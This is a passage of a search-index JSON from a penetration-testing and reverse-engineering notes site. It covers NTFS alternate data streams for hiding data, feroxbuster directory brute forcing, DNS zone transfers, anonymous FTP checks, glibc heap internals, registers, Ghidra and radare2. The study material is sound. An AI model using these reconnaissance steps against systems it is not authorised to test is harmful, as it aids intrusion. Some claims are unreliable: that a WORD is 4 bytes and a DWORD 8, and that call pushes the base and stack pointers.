makes them an easy way to hide data within legitimately looking files. Every file in NTFS has at least one default data stream where its data is stored. The default data stream is innominate and any stream which does have a name is considered an alternate data stream.","breadcrumbs":"System Internals » Windows » File System » Alternate Data Streams (ADS)","id":"266","title":"Alternate Data Streams (ADS)"},"267":{"body":"ADSs cannot be manipulated via Windows Explorer and so the command-line is needed. File operations with alternate data streams on the command-line work the same, but you will need to use the : format to refer to the stream you want to manipulate. For example, echo hello > file.txt\necho secret > file.txt:hidden Windows Explorer is completely oblivious to the alternate data stream. The command-line, however, is not: Additionally, the dir /R command can be used to list alternate data streams for files in a directory: A more sophisticated tool for managing ADSs, called Streams comes with the SysInternals suite. It can be used with the -s option to recursively show all streams for the files in a directory: The number next to the stream name is the size of the data stored in the stream. Streams can also be used to delete all streams from a file with the -d option:","breadcrumbs":"System Internals » Windows » File System » Working with ADSs","id":"267","title":"Working with ADSs"},"268":{"body":"","breadcrumbs":"Reverse Engineering » Reverse Engineering","id":"268","title":"Reverse Engineering"},"269":{"body":"","breadcrumbs":"Reverse Engineering » Program Anatomy » Program Anatomy","id":"269","title":"Program Anatomy"},"27":{"body":"This is the first step one needs to take after discovering a web application. The goal is to identify all publicly-accessible routes on the server such as files, directories and API endpoints. In order to do so, we can use various tools such as gobuster and feroxbuster . The technique works by sampling common file and directory names from a wordlist and then querying the server with these routes. Depending on the response code the server returns, one can determine which routes are publicly-accessible, which ones require some sort of authentication and which ones simply do not exist on the server. The basic syntax for feroxbuster is the following: feroxbuster -u -w The 200's (green) codes indicate a file or directory that is publicly accessible. The 300's (orange) code numbers represent a web page which redirects to another page. This may be because we are currently not authenticated as a user who can view said page. The 400's (red) codes represent errors. More specifically, 404 means that the web page does not exist on the server and 403 means that the page does exists, but we are not allowed to access it. Note SecLists is a large collection of wordlists whose contents range from commmon URLs and file names to usernames and passwords. In contrast to other directory brute forcing tools, feroxbuster is recursive by default. If it finds a directory, it is going to begin brute forcing its contents as well. This is useful because it generates a comprehensive list of most, if not all, files and directories on the server. Nevertheless, this does usually take a lot of time. This behaviour can be disabled by using the --no-recursion flag. feroxbuster also supports appending filename extensions by using the -x command-line argument. This can come in handy, for example, when one has discovered the primary language / framework used on the server (PHP, ASPX, etc.).","breadcrumbs":"Reconnaissance » Enumeration » Web Server Enumeration (80, 443) » Directory Brute Force","id":"27","title":"Directory Brute Force"},"270":{"body":"The stack is a place in memory. It's a Last-In-First-Out (LIFO) data structure, meaning that the last element to be added will be the first to get removed. Each process has access to its own stack which isn't bigger than a few megabytes. Adding data to the stack is called pushing onto the stack, whilst removing data is called popping off the stack. Although the location of the added or removed data is fixed (it's always to or from the top of the stack), existing data can still be read or written to arbitrarily. A special register is used for keeping track of the top of the stack - the stack pointer or rsp. When pushing data, the stack pointer diminishes , and when removing data, the stack pointer augments . This is because the stack grows from higher to lower memory addresses.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Stack » The Stack","id":"270","title":"The Stack"},"271":{"body":"When a function is invoked, a stack frame is constructed. First, the function's arguments which do not fit into the registers are pushed on the stack, then the return address is also pushed. Following this, the value of a special register known as the base pointer (rbp) is saved onto the stack and the value inside the register is then updated to point to the location on the stack where we saved the base pointer. From then on, the stack pointer is used for allocating local data inside the function and the base pointer is used for accessing this data. long func(long a, long b, long c, long d, long e, long f, long g, long h)\n{ long x = a * b * c * d * e * f * g * h; long y = a + b + c + d + e + f + g + h; long z = otherFunc(x, y); return z + 20;\n} Sometimes, the base pointer might be completely absent in optimised programs because compilers are good enough in keeping track of offsets directly from the stack pointer.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Stack » Stack Frames","id":"271","title":"Stack Frames"},"272":{"body":"Each program is comprised of a set of instructions which tell the CPU what operations it needs to perform. Different CPU architectures make use of different instruction sets, however, all of them boil down to two things - an opertation code (opcode) and optional data that the instruction operates with. These are all represented using bits - 1s and 0s.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » Instructions","id":"272","title":"Instructions"},"273":{"body":"Moves the value inside one register to another: mov rax, rdx","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » mov","id":"273","title":"mov"},"274":{"body":"Load effective address - this instruction calculates the address of its second operand and moves it into its first operand: lea rdx, [rax+0x10] This will move rax+0x10 inside rdx.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » lea","id":"274","title":"lea"},"275":{"body":"This instruction adds its operands and stores the result in its first operand: add rax, rdx","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » add","id":"275","title":"add"},"276":{"body":"This instruction subtracts the second operand from the first and stores the result in its first operand sub rax, 0x9","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » sub","id":"276","title":"sub"},"277":{"body":"It performs XOR-ing on its operands and stores the results into the first operand: xor rdx, rax The and and or are the same, but instead perform a binary AND and a binary OR operation, respectively.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » xor","id":"277","title":"xor"},"278":{"body":"Decreases the stack pointer (grows the stack) by 8 (4 on x86) bytes and stores the contents of its operand on the stack: push rax","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » push","id":"278","title":"push"},"279":{"body":"Increases the stack pointer (shrinks the stack) by 8 (4 on x86) bytes and stores the popped value from the stack into its operand: pop rax","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » pop","id":"279","title":"pop"},"28":{"body":"The BIND software is the most commonly used name server software, which supports CHAOSNET queries. This can be used to query the name server for its software type and version. We are no longer querying the domain name system but are instead requesting information about the BIND instance. Our queries will still take the form of domain names - using .bind as the top-level domain. The results from such a query are returned as TXT records. Use the following syntax for quering BIND with the CHAOS class: dig @ ┌──(cr0mll@kali)-[~]-[]\n└─$ dig @192.168.129.138 chaos version.bind txt ; <<>> DiG 9.16.15-Debian <<>> @192.168.129.138 chaos version.bind txt\n; (1 server found)\n;; global options: +cmd\n;; Got answer:\n;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38138\n;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1\n;; WARNING: recursion requested but not available ;; OPT PSEUDOSECTION:\n; EDNS: version: 0, flags:; udp: 4096\n;; QUESTION SECTION:\n;version.bind. CH TXT ;; ANSWER SECTION:\nversion.bind. 0 CH TXT \"9.8.1\" ;; AUTHORITY SECTION:\nversion.bind. 0 CH NS version.bind. ;; Query time: 0 msec\n;; SERVER: 192.168.129.138#53(192.168.129.138)\n;; WHEN: Tue Sep 14 16:24:35 EEST 2021\n;; MSG SIZE rcvd: 73 Looking at the answer section, we see that this name server is running BIND 9.8.1. Other chaos records you can request are hostname.bind, authors.bind, and server-id.bind.","breadcrumbs":"Reconnaissance » Enumeration » DNS Server Enumeration (53) » Enumerating BIND servers with CHAOS","id":"28","title":"Enumerating BIND servers with CHAOS"},"280":{"body":"Jumps to the address specified - used for redirecting code execution: jmp 0x6A2B10","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » jmp","id":"280","title":"jmp"},"281":{"body":"Used for invoking procedures. It first pushes the values of the base and stack pointers onto the stack and then jumps to the specified address. After the function is finished, a ret instruction is issued which restores the values of the stack and base pointers from the stack and continues execution from where it left off.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » call","id":"281","title":"call"},"282":{"body":"It compares the value of its two operands and sets the according flags depending on the result: cmp rax, rdx If rax < rdx, the zero flag is set to 0 and the carry flag is set to 1. If rax > rdx, the zero flag is set to 0 and the carry flag is set to 0. If rax = rdx, the zero flag is set to 1 and the carry flag is set to 0.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » cmp","id":"282","title":"cmp"},"283":{"body":"jump-if-zero and jump-if-not-zero execute depending on the state of the zero flag.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » jz / jnz","id":"283","title":"jz / jnz"},"284":{"body":"The heap is a memory region which allows for dynamic allocation. Memory on the heap is allotted at runtime and programs are permitted to freely request additional heap memory whenever it is required. It is the program's job to request and relieve any heap memory only once . Failure to do so can result in undefined behaviour. In C, heap memory is usually allocated through the use of malloc and whenever the program is finished with this data, the free function must be invoked in order to mark the area as available for use by the operating system and/or other programs. Heap memory can also be allocated by using malloc-compatible heap functions like calloc, realloc and memalign or in C++ using the corresponding new and new[] operators as well as their deallocation counterparts delete and delete[].","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » The Heap","id":"284","title":"The Heap"},"285":{"body":"Do not read or write to a pointer returned by malloc after that pointer has been passed to free. -> Can lead to use after free vulnerabilities. Do not use or leak uninitialised information in a heap allocation. -> Can lead to information leaks or uninitialised data vulnerabilities. Do not read or write bytes after the end of an allocation. -> Can lead to heap overflow and read beyond bounds vulnerabilities. Do not pass a pointer that originated from malloc to free more than once. -> Can lead to double delete vulnerabilities. Do not write bytes before the beginning of the allocation. -> Can lead to heap underflow vulnerabilities. Do not pass a pointer that did not originate from malloc to free. -> Can lead to invalid free vulnerabilities. Do not use a pointer returned by malloc before checking if the function returned NULL. -> Can lead to null-dereference bugs and sometimes arbitrary write vulnerabilities. The implementation of the heap is platform specific.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Heap Rules","id":"285","title":"Heap Rules"},"286":{"body":"The heap grows from lower to higher addresses.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » The GLIBC Heap","id":"286","title":"The GLIBC Heap"},"287":{"body":"The heap manager allocates resources in the so-called chunks . These chunks are stored adjacent to each other and must be 8-byte aligned or 16-byte aligned on 32-bit and 64-bit systems respectively. In addition to this padding, each chunks contains metadata which provides information about the chunk itself. Consequently, issuing a request for memory allocation on the heap actually allocates more bytes than originally requested. It is important to distinguish between in-use chunks and free (or previously allocated) chunks, since they have disparate memory layouts. The following diagram outlines a chunk that is in use: The size field contains the chunk size in bytes. The following three bits carry specific meaning: A (0x04) - Allocated arena. If this bit is 0, the chunk comes from the main arena and the main heap. If this bit is 1, the chunk comes from mmap'd memory and the location of the heap can be computed from the chunk's address. M (0x02) - If this bit is set, then the chunk was mmap-ed and isn't part of a heap. Typically used for large allocations. P (0x01) - If this bit is set, then the previous chunk should not be considered for coalescing and the mchunkptr points to a previous chunk still in use A free chunk looks a bit different: The size and AMP fields carry on the same meaning as those in chunks that are in use. Free chunks are organised in linked or doubly linked lists called bins . The fwd and bck pointers are utilised in the implementation of those linked lists. Different types of bins exist for different purposes. The top of the heap is by convention called the top chunk .","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Chunks","id":"287","title":"Chunks"},"288":{"body":"","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Memory Allocation on the Heap","id":"288","title":"Memory Allocation on the Heap"},"289":{"body":"When an application requests heap memory, the heap manager traverses the bins in search of a free chunk that is large enough to service the request. If such a chunk is found, it is removed from the bin, turned into an in-use chunk and then a pointer is returned to the user data section of the chunk.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Allocating from Free Chunks","id":"289","title":"Allocating from Free Chunks"},"29":{"body":"A Zone transfer request provides the means for copying a DNS zone file from one name server to another. This, however, only works over TCP. By doing this, you can obtain all the records of a DNS server for a particular zone. This is done through the AXFR request type: dig @ AXFR ┌──(cr0mll0@kali)-[~]-[]\n└─$ dig @192.168.129.138 AXFR nsa.gov ; <<>> DiG 9.16.15-Debian <<>> @192.168.129.138 AXFR nsa.gov\n; (1 server found)\n;; global options: +cmd\nnsa.gov. 3600 IN SOA ns1.nsa.gov. root.nsa.gov. 2007010401 3600 600 86400 600\nnsa.gov. 3600 IN NS ns1.nsa.gov.\nnsa.gov. 3600 IN NS ns2.nsa.gov.\nnsa.gov. 3600 IN MX 10 mail1.nsa.gov.\nnsa.gov. 3600 IN MX 20 mail2.nsa.gov.\nfedora.nsa.gov. 3600 IN TXT \"The black sparrow password\"\nfedora.nsa.gov. 3600 IN AAAA fd7f:bad6:99f2::1337\nfedora.nsa.gov. 3600 IN A 10.1.0.80\nfirewall.nsa.gov. 3600 IN A 10.1.0.105\nfw.nsa.gov. 3600 IN A 10.1.0.102\nmail1.nsa.gov. 3600 IN TXT \"v=spf1 a mx ip4:10.1.0.25 ~all\"\nmail1.nsa.gov. 3600 IN A 10.1.0.25\nmail2.nsa.gov. 3600 IN TXT \"v=spf1 a mx ip4:10.1.0.26 ~all\"\nmail2.nsa.gov. 3600 IN A 10.1.0.26\nns1.nsa.gov. 3600 IN A 10.1.0.50\nns2.nsa.gov. 3600 IN A 10.1.0.51\nprism.nsa.gov. 3600 IN A 172.16.40.1\nprism6.nsa.gov. 3600 IN AAAA ::1\nsigint.nsa.gov. 3600 IN A 10.1.0.101\nsnowden.nsa.gov. 3600 IN A 172.16.40.1\nvpn.nsa.gov. 3600 IN A 10.1.0.103\nweb.nsa.gov. 3600 IN CNAME fedora.nsa.gov.\nwebmail.nsa.gov. 3600 IN A 10.1.0.104\nwww.nsa.gov. 3600 IN CNAME fedora.nsa.gov.\nxkeyscore.nsa.gov. 3600 IN TXT \"knock twice to enter\"\nxkeyscore.nsa.gov. 3600 IN A 10.1.0.100\nnsa.gov. 3600 IN SOA ns1.nsa.gov. root.nsa.gov. 2007010401 3600 600 86400 600\n;; Query time: 4 msec\n;; SERVER: 192.168.129.138#53(192.168.129.138)\n;; WHEN: Fri Sep 17 22:38:47 EEST 2021\n;; XFR size: 27 records (messages 1, bytes 709)","breadcrumbs":"Reconnaissance » Enumeration » DNS Server Enumeration (53) » DNS Zone Transfer","id":"29","title":"DNS Zone Transfer"},"290":{"body":"If no free chunk is found that can service the request, the heap manager must construct an entirely new chunk at the top of heap. To achieve this, it first needs to ascertain whether there is enough space at the top of the heap to hold the new chunk.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Allocating from the Top Chunk","id":"290","title":"Allocating from the Top Chunk"},"291":{"body":"Once the free space at the top of the heap is used up, the heap manager will have to ask the kernel for additional memory. On the initial heap, the heap manager asks the kernel to allocate more memory at the end of the heap by calling sbrk.On most Linux-based systems this function internally uses a system call called brk. Eventuall, the heap will grow to its maximum size, since expanding it any further would cause it to intrude on other sections of the process' address space. In this case, the heap manager will resort to using mmap to map new memory for heap expansions. If mmap also fails, then the process is unable to allocate more memory and malloc returns NULL.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Requesting Additional Memory at the Top of the Heap from the Kernel","id":"291","title":"Requesting Additional Memory at the Top of the Heap from the Kernel"},"292":{"body":"Large chunks get treated differently in their allocation. These are allocated off-heap through the direct use of mmap calls and this is reflected in the chunk's metadata by setting the M bit to 1. When such allocations are later returned to the heap manager via a call to free, the heap manager releases the entire mmap-ed region back to the system via munmap. Different platforms have different default thresholds for what counts as a large chunk and what doesn't.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Allocating Large Chunks","id":"292","title":"Allocating Large Chunks"},"293":{"body":"Multithreaded applications require that internal data structures on the heap are protected from race conditions. In the past, the heap manager availed itself of a global mutex before every heap operation, however, significant performance issues arose as a result. Consequently, the concept of \"arenas\" was introduced. Each arena consists of a separate heap which manages its own chunk allocation and bins. Although each arena still utilises a mutex for its internal operations, different threads can make use of different arenas to avoid having to wait for each other. The initial (main) arena consists of a single heap and for single-threaded applications it is all there ever will exist. However, as more threads are spawned, new arenas are allocated and attached to them. Once all available arenas are being utilised by threads, the heap manager will commence creating new ones until a limit - 2 * Number of CPU cores for 32-bit and 8 * Number of CPU cores for 64-bit processes - is reached. Afterwards, multiple threads will be forced to share the same arena.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Arenas","id":"293","title":"Arenas"},"294":{"body":"Free chunks are organised in the so-called bins which are essentially linked lists. For performance reasons different types of bins exist. There are 62 small bins, 63 large bins, 1 unsorted bin, 10 fast bins and 64 tcache bins per thread. The last two appeared later and are built on top of the first three. Pointers to the small, large, and unsorted bins are stored in the same array in the heap manager: BIN[0] -> invalid (unused)\nBIN[1] -> unsorted bin\nBIN[2] to BIN[63] -> small bins\nBIN[64] to BIN[126] -> large bins","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Bins","id":"294","title":"Bins"},"295":{"body":"There are 62 small bins and each of them stores chunks of a fixed size. Each chunk with a size less than 512 bytes on 32-bit systems and 1024 bytes on 64-bit systems has a corresponding small bin. Small bins are sorted by default due to the fixed size of their elements and Insertion and removal of entries on these bins is incredibly fast.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Small Bins","id":"295","title":"Small Bins"},"296":{"body":"There are 63 large bins and they resemble small bins in their operation but store chunks of different sizes. Consequently, insertions and removal of entries on these lists is slower, since the entire bin has to be traversed in order to find a suitable chunk. There is a different number of bins allocated for specific chunk size ranges. The size of the chunk size range begins at 64 bytes - there are 32 bins all of which shift the range of chunk sizes they store by 64 from the previous bin. Following are 16 bins which shift the range by 512 bytes and so on. In essence: Bin 1 -> stores chunks of sizes 512 - 568 bytes; Bin 2 -> stores chunks of sizes 576 - 632 bytes; ... There are: Number of Bins Spacing between Bins 32 64 16 512 8 4096 4 32768 2 262144 1 Remaining chunk sizes","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Large Bins","id":"296","title":"Large Bins"},"297":{"body":"There is a single unsorted bin. Chunks from small and large bins end up directly in this bin after they are freed. The point of the unsorted bin is to speed up allocations by serving a sort of cache. When malloc is invoked, it will first traverse this bin and see if it can immediately service the request. If not, it will move onto the small or large bins respectively.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Unsorted Bins","id":"297","title":"Unsorted Bins"},"298":{"body":"Fast bins provide a further optimisation layer. Recently released small chunks are put in fast bins and are not initially merged with their neighbours. This allows for them to be repurposed forthwith, should a malloc request for that chunk size come very soon after the chunk's release. There are 10 fast bins, covering chunks of size 16, 24, 32, 40, 48, 56, 64, 72, 80, and 88 bytes plus chunk metadata. Fast bins are implemented as singly linked lists and insertions and removals of entries in them are really fast. Periodically, the heap manager consolidates the heap - chunks in the fast bins are merged with the abutting chunks and inserted into the unsorted bin. This consolidation occurs when a malloc request is issued for a size that is larger than a fast bin can serve (chunks over 512 bytes on 32-bit systems and over 1024 bytes on 64-bit systems), when freeing a chunk larger than 64KB or when malloc_trim or mallopt is invoked.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Fast Bins","id":"298","title":"Fast Bins"},"299":{"body":"A new caching mechanism called tcache (thread local caching) was introduced in glibc version 2.26 back in 2017. The tcache stores bins of fixed size small chunks as singly linked lists. Similarly to a fast bin, chunks in tcache bins aren't merged with adjoining chunks. By default, there are 64 tcache bins, each containing a maximum of 7 same-sized chunks. The possible chunk sizes range from 12 to 516 bytes on 32-bit systems and from 24 to 1032 bytes on 64-bit systems. When a chunk is freed, the heap manager checks if the chunk fits into a tcache bin corresponding to that chunk size. If the tcache bin for this size is full or the chunk is simply too big to fit into a tcache bin, the heap manager obtains a lock on the arena and proceeds to comb through other bins in order to find a suitable one for the chunk. When malloc needs to service a request, it first checks the tcache for a chunk of the requested size that is available and should such a chunk be found, malloc will return it without ever having to obtain a lock. If the chunk too big, malloc continues as before. A slightly different strategy is employed if the requested chunk size does have a corresponding tcache bin, but that bin is simply full. In that case, malloc obtains a lock and promotes as many heap chunks of the requested size to tcache chunks, up to the tcache bin limit of 7. Subsequently, the last matching chunk is returned.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » TCache Bins","id":"299","title":"TCache Bins"},"3":{"body":"Any major changes outside of the eight category folders in the Notes/ directory are not permitted and will be rejected.","breadcrumbs":"Cyberclopaedia » Contributing » Out-of-Scope","id":"3","title":"Out-of-Scope"},"30":{"body":"The File Transfer Protocol (FTP) is a common protocol which you may find during a penetration test. It is a TCP-based protocol and runs on port 21. Luckily, its enumeration is simple and rather straight-forward. You can use the ftp command if you have credentials: ftp You can then proceed with typical navigation commands like dir, cd, pwd, get and send to navigate and interact with the remote file system. If you don't have credentials you can try with the usernames guest, anonymous, or ftp and an empty password in order to test for anonymous login.","breadcrumbs":"Reconnaissance » Enumeration » FTP Enumeration (21) » Introduction","id":"30","title":"Introduction"},"300":{"body":"","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » malloc and free","id":"300","title":"malloc and free"},"301":{"body":"First, every allocation exists as a memory chunk which is aligned and contains metadata as well as the region the programmer wants. When a programmer requests memory from the heap, the heap manager first works out what chunk size the allocation request corresponds to, and then searches for the memory in the following order: If the size corresponds with a tcache bin and there is a tcache chunk available, return that immediately. If the request is huge, allocate a chunk off-heap via mmap. Otherwise obtain the arena heap lock and then perform the following steps, in order: Try the fastbin/smallbin recycling strategy If a corresponding fast bin exists, try and find a chunk from there (and also opportunistically prefill the tcache with entries from the fast bin). Otherwise, if a corresponding small bin exists, allocate from there (opportunistically prefilling the tcache as we go). Resolve all the deferred frees - Otherwise merge the entries in the fast bins and move their consolidated chunks to the unsorted bin. - Go through each entry in the unsorted bin. If it is suitable, return it. Otherwise, put the unsorted entry on its corresponding small/large bin as we go (possibly promoting small entries to the tcache). Default back to the basic recycling strategy If the chunk size corresponds with a large bin, search the corresponding large bin now. Create a new chunk from scratch Otherwise, there are no chunks available, so try and get a chunk from the top of the heap. If the top of the heap is not big enough, extend it using sbrk. If the top of the heap can’t be extended because we ran into something else in the address space, create a discontinuous extension using mmap and allocate from there If all else fails, return NULL.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Allocation","id":"301","title":"Allocation"},"302":{"body":"If the pointer is NULL, do nothing. Otherwise, convert the pointer back to a chunk by subtracting the size of the chunk metadata. Perform a few sanity checks on the chunk, and abort if the sanity checks fail. If the chunk fits into a tcache bin, store it there. If the chunk has the M bit set, give it back to the operating system via munmap. Otherwise we obtain the arena heap lock and then: If the chunk fits into a fastbin, put it on the corresponding fastbin. If the chunk size is greater than 64KB, consolidate the fastbins immediately and put the resulting merged chunks on the unsorted bin. Merge the chunk backwards and forwards with neighboring freed chunks in the small, large, and unsorted bins. If the resulting chunk lies at the top of the heap, merge it into the top chunk. Otherwise store it in the unsorted bin.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Deallocation","id":"302","title":"Deallocation"},"303":{"body":"Registers are value containers which reside on the CPU and not in RAM. They are small in size and some have special purposes. You may store both addresses and values in registers and depending on the instruction used the data inside will be interpreted in a different way - this is commonly called an addressing mode . In x86 Intel assembly (i386), the registers are 32 bits (4 bytes) in size and some of them are reserved: ebp - the base pointer, points to the bottom of the current stack frame esp - the stack pointer, points to the top of the current stack frame eip - the instruction pointer, points to the next instruction to be executed The other registers are general purpose registers and can be used for anything you like: eax, ebx, ecx, edx, esi, edi. x64 AMD assembly (amd64) extends these 32-bit registers to 64-bit ones and denotes these new versions by replacing the initial e with an r: rbp, rsp, rip, rax, ... It is important to note that these are not different registers - eax and rax refer to the same space on the CPU, however, eax only provides access to the lower 32 bits of the 64-bit register. You can also get access to the lower 16 and 8 bits of the register using different names: 8 Byte Register Lower 4 Bytes Lower 2 Bytes Lower Byte rbp ebp bp bpl rsp esp sp spl rip eip rax eax ax al rbx ebx bx bl rcx ecx cx cl rdx edx dx dl rsi esi si sil rdi edi di dil r8 r8d r8w r8b r9 r9d r9w r9b r10 r10d r10w r10b r11 r11d r11w r11b r12 r12d r12w r12b r13 r13d r13w r13b r14 r14d r14w r14b r15 r15d r15w r15b Each row contains names which refer to different parts of the same register. Note, you cannot access the lower 16 or 8 bits of the instruction pointer. You might sometimes see WORD or DWORD being used in a similar context - WORD means 4 bytes and DWORD means 8 bytes.","breadcrumbs":"Reverse Engineering » Program Anatomy » Registers » Registers","id":"303","title":"Registers"},"304":{"body":"Under x64 Linux, function arguments are passed via registers: rdi: First Argument\nrsi: Second Argument\nrdx: Third Argument\nrcx: Fourth Argument\nr8: Fifth Argument\nr9: Sixth Argument The return value is store in rax (eax on 32-bit machines).","breadcrumbs":"Reverse Engineering » Program Anatomy » Registers » Register Use in x64 Linux","id":"304","title":"Register Use in x64 Linux"},"305":{"body":"Register dereferencing occurs when the value of the register is treated as an address to the actual data to be used, rather than the data itself. This means that addressed can be stored in registers and used later - this is useful when dealing with large data sizes. For example, mov rax, [rdx] Will check the value inside rdx and treat it as an address - it will go to the location where this address points and get its data from there. It will then move this data into rax. If we hadn't used [], it would have treated the address in rdx simply as a value and moved it directly into rax.","breadcrumbs":"Reverse Engineering » Program Anatomy » Registers » Register Dereferencing","id":"305","title":"Register Dereferencing"},"306":{"body":"Ghidra is an open-source framework for reverse engineering developed by the NSA. It groups binaries into projects which can be shared amonst multiple people.","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Introduction","id":"306","title":"Introduction"},"307":{"body":"To install Ghidra, you can run sudo apt install ghidra.","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Installation","id":"307","title":"Installation"},"308":{"body":"File -> New Project Non-Shared Project Select Directory Name the Project","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Creating a Project and Loading a Binary » Creating a Project","id":"308","title":"Creating a Project"},"309":{"body":"File -> Import File Select the binary you want to import Ghidra will automatically detect certain information about the file After importing, Ghidra will display an Import Results Summary containing information about the binary","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Creating a Project and Loading a Binary » Loading a Binary","id":"309","title":"Loading a Binary"},"31":{"body":"You will need working knowledge of SNMP in order to follow through.","breadcrumbs":"Reconnaissance » Enumeration » SNMP Enumeration (161) » Introduction","id":"31","title":"Introduction"},"310":{"body":"Double-clicking on a program will open it in the Code Browser. A prompt will appear for analysing the binary. Ghidra will attempt to create and label functions, as well as identify any cross-references in memory. Once the binary has been analysed you will be presented with the following screen:","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Initial Analysis » Initial Analysis","id":"310","title":"Initial Analysis"},"311":{"body":"radare2 is an open-source framework for reverse engineering. The framework includes multiple tools which all work in tandem in order to aid in the analysis of binary files. It uses short abbreviations for its commands - single letters - and many of its commands have subcommands which are also expressed as single letters. Luckily, you can always append a ? to a specific command in order to view its subcommands and what they do. To quit radare2, use the q command.","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Introduction","id":"311","title":"Introduction"},"312":{"body":"You can load a binary by invoking the r2 command. You might sometimes need to also add the -e io.cache=true option in order to fix relocations in disassembly.","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Loading a Binary","id":"312","title":"Loading a Binary"},"313":{"body":"aaa - analyse the binary afl - list the analysed functions axt - list all the places where a function is called. Note, you need to use the flag name that redare automatically creates for funtions after aaa.","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Analysis » Analysis","id":"313","title":"Analysis"},"314":{"body":"/ - search the bytes of the binary for a specific string /w - search for wide character strings like Unicode symbols","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Strings » Strings","id":"314","title":"Strings"},"315":{"body":"i - display file information ie - find the program's entry point iM - find the program's main function iz - pull the hard-coded strings from the executable (only the data sections), use izz to get the strings from the entire binary","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Binary Info » Binary Info","id":"315","title":"Binary Info"},"316":{"body":"Flags resemble bookmarks. They associate a name with a given offset in a file. Create a new flag f @ offset You can also remove a flag by appending - to the command: f- List available flags - f: Rename a flag fr ","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Flags » Flags","id":"316","title":"Flags"},"317":{"body":"Flag names should be unique for addressing reasons. However, it is often the case that you need to have simple and ubiquitous names like loop or return. For this purpose exist the so-called \"local\" flags, which are tied to the function where they reside. It is possible to add them using f. command:","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Flags » Local Flags","id":"317","title":"Local Flags"},"318":{"body":"Flags can be grouped into flag spaces - is a namespace for flags, grouping together similar flags. Some flag spaces include sections, registers, symbols. These are managed with the fs command. [0x00001080]> fs?\nUsage: fs [*] [+-][flagspace|addr] # Manage flagspaces\n| fs display flagspaces\n| fs* display flagspaces as r2 commands\n| fsj display flagspaces in JSON\n| fs * select all flagspaces\n| fs flagspace select flagspace or create if it doesn't exist\n| fs-flagspace remove flagspace\n| fs-* remove all flagspaces\n| fs+foo push previous flagspace and set\n| fs- pop to the previous flagspace\n| fs-. remove the current flagspace\n| fsq list flagspaces in quiet mode\n| fsm [addr] move flags at given address to the current flagspace\n| fss display flagspaces stack\n| fss* display flagspaces stack in r2 commands\n| fssj display flagspaces stack in JSON\n| fsr newname rename selected flagspace","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Flags » Flag Spaces","id":"318","title":"Flag Spaces"},"319":{"body":"Moving around the file requires the usage of the seek (s) command in order to change the offset at which we are. It takes one argument which is a mathematical expression capable of containing flag names, parenthesis, addition, substraction, multiplication of immediates of contents of memory using brackets. Examples: [0x00000000]> s 0x10\n[0x00000010]> s+4\n[0x00000014]> s-\n[0x00000010]> s+\n[0x00000014]> Here is a list of additional seeking commands: [0x00000000]> s?\nUsage: s # Help for the seek commands. See ?$? to see all variables\n| s Print current address\n| s.hexoff Seek honoring a base from core->offset\n| s:pad Print current address with N padded zeros (defaults to 8)\n| s addr Seek to address\n| s- Undo seek\n| s-* Reset undo seek history\n| s- n Seek n bytes backward\n| s--[n] Seek blocksize bytes backward (/=n)\n| s+ Redo seek\n| s+ n Seek n bytes forward\n| s++[n] Seek blocksize bytes forward (/=n)\n| s[j*=!] List undo seek history (JSON, =list, *r2, !=names, s==)\n| s/ DATA Search for next occurrence of 'DATA'\n| s/x 9091 Search for next occurrence of \\x90\\x91\n| sa [[+-]a] [asz] Seek asz (or bsize) aligned to addr\n| sb Seek aligned to bb start\n| sC[?] string Seek to comment matching given string\n| sf Seek to next function (f->addr+f->size)\n| sf function Seek to address of specified function\n| sf. Seek to the beginning of current function\n| sg/sG Seek begin (sg) or end (sG) of section or file\n| sl[?] [+-]line Seek to line\n| sn/sp ([nkey]) Seek to next/prev location, as specified by scr.nkey\n| so [N] Seek to N next 